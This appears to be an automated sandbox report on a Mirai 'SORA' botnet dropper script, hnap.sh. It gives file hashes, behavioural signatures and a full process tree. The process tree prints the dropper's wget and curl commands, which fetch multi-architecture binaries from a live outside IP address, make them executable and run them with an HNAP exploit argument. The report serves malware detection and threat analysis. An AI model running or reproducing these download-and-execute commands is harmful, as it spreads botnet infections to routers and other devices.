Analysis
-
max time kernel
61s -
max time network
150s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
20-02-2025 16:26
Static task
static1
Behavioral task
behavioral1
Sample
hnap.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
hnap.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
hnap.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
hnap.sh
-
Size
2KB
-
MD5
76c625416800cf3073f832c6fdb90dfe
-
SHA1
1d9e582097338454f484559f64b639795e0aa51e
-
SHA256
73e4a86bb7a5969fc3ee995b34dec87af69f4083efac0828a9d4b89f25ffed6e
-
SHA512
9a8edf9a9d1ca1b67dd72b3e304a30bf585b450ec1386b5bd84438f7c22adecfd1e095d3d9b7dfa800cbf783fe8589047e0d6a7ea19d1f65cbdd03e20824766d
Malware Config
Extracted
mirai
SORA
Signatures
-
Mirai family
-
Contacts a large (43844) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 745 chmod 786 chmod 809 chmod 843 chmod 865 chmod 891 chmod 897 chmod 737 chmod 751 chmod 764 chmod 824 chmod 829 chmod 880 chmod 886 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 739 hnap.sh /tmp/robben 746 hnap.sh /tmp/robben 752 hnap.sh /tmp/robben 765 hnap.sh /tmp/robben 787 hnap.sh /tmp/robben 810 hnap.sh /tmp/robben 825 hnap.sh /tmp/robben 830 hnap.sh /tmp/robben 844 hnap.sh /tmp/robben 867 hnap.sh /tmp/robben 881 hnap.sh /tmp/robben 887 hnap.sh /tmp/robben 892 hnap.sh /tmp/robben 898 hnap.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-4.dat upx behavioral4/files/fstream-5.dat upx behavioral4/files/fstream-7.dat upx -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself 04kjfn1j5chkc51j1n 810 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/679/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/701/exe robben File opened for reading /proc/796/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/682/exe robben File opened for reading /proc/707/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/813/exe robben File opened for reading /proc/673/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/669/exe robben File opened for reading /proc/706/exe robben File opened for reading /proc/709/exe robben File opened for reading /proc/712/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/434/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/817/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/801/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/708/exe robben File opened for reading /proc/833/exe robben File opened for reading /proc/681/exe robben File opened for reading /proc/812/exe robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 741 wget 743 curl 744 cat -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/robben hnap.sh File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.arm7 curl
Processes
-
/tmp/hnap.sh/tmp/hnap.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:709 -
/usr/bin/wgetwget http://176.65.137.13/bins/sora.x862⤵
- Writes file to tmp directory
PID:716
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/catcat sora.x862⤵PID:736
-
-
/bin/chmodchmod +x hnap.sh robben sora.x86 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/robben./robben hnap.exploit2⤵PID:739
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:744
-
-
/bin/chmodchmod +x hnap.sh robben sora.mips sora.x86 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/robben./robben hnap.exploit2⤵PID:746
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/catcat sora.x86_642⤵PID:750
-
-
/bin/chmodchmod +x hnap.sh robben sora.mips sora.x86 sora.x86_64 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/robben./robben hnap.exploit2⤵PID:752
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.i4682⤵PID:754
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/catcat sora.i4682⤵PID:762
-
-
/bin/chmodchmod +x hnap.sh robben sora.i468 sora.mips sora.x86 sora.x86_64 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/robben./robben hnap.exploit2⤵PID:765
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.i6862⤵
- Writes file to tmp directory
PID:767
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/catcat sora.i6862⤵PID:784
-
-
/bin/chmodchmod +x hnap.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/robben./robben hnap.exploit2⤵PID:787
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/catcat sora.mpsl2⤵PID:807
-
-
/bin/chmodchmod +x hnap.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/robben./robben hnap.exploit2⤵
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:810
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.arm42⤵PID:816
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/catcat sora.arm42⤵PID:823
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/robben./robben hnap.exploit2⤵PID:825
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.arm52⤵
- Writes file to tmp directory
PID:826
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/catcat sora.arm52⤵PID:828
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/robben./robben hnap.exploit2⤵PID:830
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.arm62⤵
- Writes file to tmp directory
PID:832
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/catcat sora.arm62⤵PID:841
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/robben./robben hnap.exploit2⤵PID:844
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.arm72⤵
- Writes file to tmp directory
PID:846
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/catcat sora.arm72⤵PID:864
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-f5bd9d7ffb5347baacbcea4aa33c894f-systemd-timedated.service-jj8tsp2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/robben./robben hnap.exploit2⤵PID:867
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:870
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/catcat sora.ppc2⤵PID:879
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/robben./robben hnap.exploit2⤵PID:881
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.ppc440fp2⤵PID:883
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.ppc440fp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/catcat sora.ppc440fp2⤵PID:885
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/robben./robben hnap.exploit2⤵PID:887
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:888
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/catcat sora.m68k2⤵PID:890
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/robben./robben hnap.exploit2⤵PID:892
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.sh42⤵
- Writes file to tmp directory
PID:894
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/catcat sora.sh42⤵PID:896
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/robben./robben hnap.exploit2⤵PID:898
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5fa9b6c7c37b9749884b432b1cfcd447c
SHA11ddf712db6bf2948950b7fd884766a1a5d2b4294
SHA2564a18c7f6e74bc6f4a20f948c8b0555f4688c80740a5eb9d3388fc8930ac65432
SHA5122f8f653f60de4a0562e524fb9993175a46b946e1fe476f3e180558baa0462f5725549c6587ad1b264df98cee8438adfab8bab7014ef423ff7a554ee59e9ef806
-
Filesize
28KB
MD5ce88468dfdee071a7a62485b512c56a1
SHA18a1c6f3d1024b98faba6b58072972e72936add17
SHA2569a720166ffa4e73959c5cb54af0b5637ad17cb1ac768f7a66939a07e9f0e28db
SHA51291eb34165af402c57d25c7c958605e03f680f271187174a0ab2e891c0c31322808e484a1c98b4bd6c924d68493b9d99f36474e45c4b29b5959530f79382c3d8c
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5a70636d57e9deea3ce72e6e0212965f0
SHA14761f53ca4d1ba6f193adbb9c460acc6c8b14d38
SHA25686103ccdb8e57a2c6a9be1828561fbf4f07adc21e432f8e21ebcc10eebb0281c
SHA512e9b69afa60a19d13f7780428eea5b071328301282b3f589787078d45a6b79f53d9b8c8ae39a611564fa62b726c987851a6f1a2ef45e633039a53f9c07de6357b
-
Filesize
64KB
MD54047f835c9e2afbc9ee9dea5d14587fe
SHA1c2d7f812ddede398f1a8c875152d0f262743a70e
SHA2561bfe680601595f54ba0232409784e9b939729fb44871606010cb704daef1dba0
SHA51241ddc457d226b269f6da6dff30c97cd44a2aa542b19f020039733dee3c9512ad31d1cffa5877e494055bde9e554c108f8828fea86a7c0f6663592506e337d787
-
Filesize
27KB
MD5c0c367bd815a1550281a34845445dcb3
SHA1cdaeafd335143dd8c3584c0ba8362c6281b38786
SHA256438747b91b304a609ccd2b5a7502fea1e20b6beabdb035834f335825b182644e
SHA51260adf781185e829c222bd0570193cfa157bf622323404bb629692a9b18da9e73c8d59fd2305c96172f374fdab20dceadae45ac4137d6ae6e3fc6861ae8a24ead